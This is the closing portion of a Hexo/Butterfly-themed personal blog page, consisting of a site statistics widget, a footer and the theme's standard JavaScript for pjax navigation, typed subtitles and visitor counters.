2023</span><span class="card-archive-list-count">5</span></a></li></ul></div><div class="card-widget card-webinfo"><div class="item-headline"><i class="fas fa-chart-line"></i><span>网站资讯</span></div><div class="webinfo"><div class="webinfo-item"><div class="item-name">文章数目 :</div><div class="item-count">60</div></div><div class="webinfo-item"><div class="item-name">已运行时间 :</div><div class="item-count" id="runtimeshow" data-publishDate="2021-12-06T16:00:00.000Z"></div></div><div class="webinfo-item"><div class="item-name">本站总字数 :</div><div class="item-count">69k</div></div><div class="webinfo-item"><div class="item-name">本站访客数 :</div><div class="item-count" id="busuanzi_value_site_uv"></div></div><div class="webinfo-item"><div class="item-name">本站总访问量 :</div><div class="item-count" id="busuanzi_value_site_pv"></div></div><div class="webinfo-item"><div class="item-name">最后更新时间 :</div><div class="item-count" id="last-push-date" data-lastPushDate="2024-06-04T03:41:50.855Z"></div></div></div></div></div></div></main><footer id="footer" style="background-image: url('/img/bg.jpg')"><div id="footer-wrap"><div class="copyright">©2020 - 2024 By Hyyrent</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div><div class="footer_custom_text">Hi, welcome to my <a href="https://pizz33.github.io/">blog</a>!</div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="translateLink" type="button" title="简繁转换">簡</button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="/js/tw_cn.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.js"></script><script>function panguFn () {
if (typeof pangu === 'object') pangu.autoSpacingPage()
else {
getScript('https://cdn.jsdelivr.net/npm/pangu/dist/browser/pangu.min.js')
.then(() => {
pangu.autoSpacingPage()
})
}
}
function panguInit () {
if (false){
GLOBAL_CONFIG_SITE.isPost && panguFn()
} else {
panguFn()
}
}
document.addEventListener('DOMContentLoaded', panguInit)</script><div class="js-pjax"><script>function subtitleType () {
if (true) {
window.typed = new Typed("#subtitle", {
strings: ["潜心静学,不骄不躁"],
startDelay: 300,
typeSpeed: 150,
loop: true,
backSpeed: 50
})
} else {
document.getElementById("subtitle").innerHTML = '潜心静学,不骄不躁'
}
}
if (true) {
if (typeof Typed === 'function') {
subtitleType()
} else {
getScript('https://cdn.jsdelivr.net/npm/typed.js/lib/typed.min.js').then(subtitleType)
}
} else {
subtitleType()
}</script></div><script defer="defer" id="ribbon" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/canvas-ribbon.min.js" size="150" alpha="0.6" zIndex="-1" mobile="false" data-click="true"></script><script id="click-heart" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/click-heart.min.js" async="async" mobile="true"></script><script src="https://cdn.jsdelivr.net/npm/pjax/pjax.min.js"></script><script>let pjaxSelectors = ["title","#config-diff","#body-wrap","#rightside-config-hide","#rightside-config-show",".js-pjax"]
var pjax = new Pjax({
elements: 'a:not([target="_blank"])',
selectors: pjaxSelectors,
cacheBust: false,
analytics: false,
scrollRestoration: false
})
document.addEventListener('pjax:send', function () {
// removeEventListener scroll
window.tocScrollFn && window.removeEventListener('scroll', window.tocScrollFn)
window.scrollCollect && window.removeEventListener('scroll', scrollCollect)
typeof preloader === 'object' && preloader.initLoading()
document.getElementById('rightside').style.cssText = "opacity: ''; transform: ''"
if (window.aplayers) {
for (let i = 0; i < window.aplayers.length; i++) {
if (!window.aplayers[i].options.fixed) {
window.aplayers[i].destroy()
}
}
}
typeof typed === 'object' && typed.destroy()
//reset readmode
const $bodyClassList = document.body.classList
$bodyClassList.contains('read-mode') && $bodyClassList.remove('read-mode')
})
document.addEventListener('pjax:complete', function () {
window.refreshFn()
document.querySelectorAll('script[data-pjax]').forEach(item => {
const newScript = document.createElement('script')
const content = item.text || item.textContent || item.innerHTML || ""
Array.from(item.attributes).forEach(attr => newScript.setAttribute(attr.name, attr.value))
newScript.appendChild(document.createTextNode(content))
item.parentNode.replaceChild(newScript, item)
})
GLOBAL_CONFIG.islazyload && window.lazyLoadInstance.update()
typeof chatBtnFn === 'function' && chatBtnFn()
typeof panguInit === 'function' && panguInit()
// google analytics
typeof gtag === 'function' && gtag('config', '', {'page_path': window.location.pathname});
// baidu analytics
typeof _hmt === 'object' && _hmt.push(['_trackPageview',window.location.pathname]);
typeof loadMeting === 'function' && document.getElementsByClassName('aplayer').length && loadMeting()
// prismjs
typeof Prism === 'object' && Prism.highlightAll()
typeof preloader === 'object' && preloader.endLoading()
})
document.addEventListener('pjax:error', (e) => {
if (e.request.status === 404) {
pjax.loadUrl('/404.html')
}
})</script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>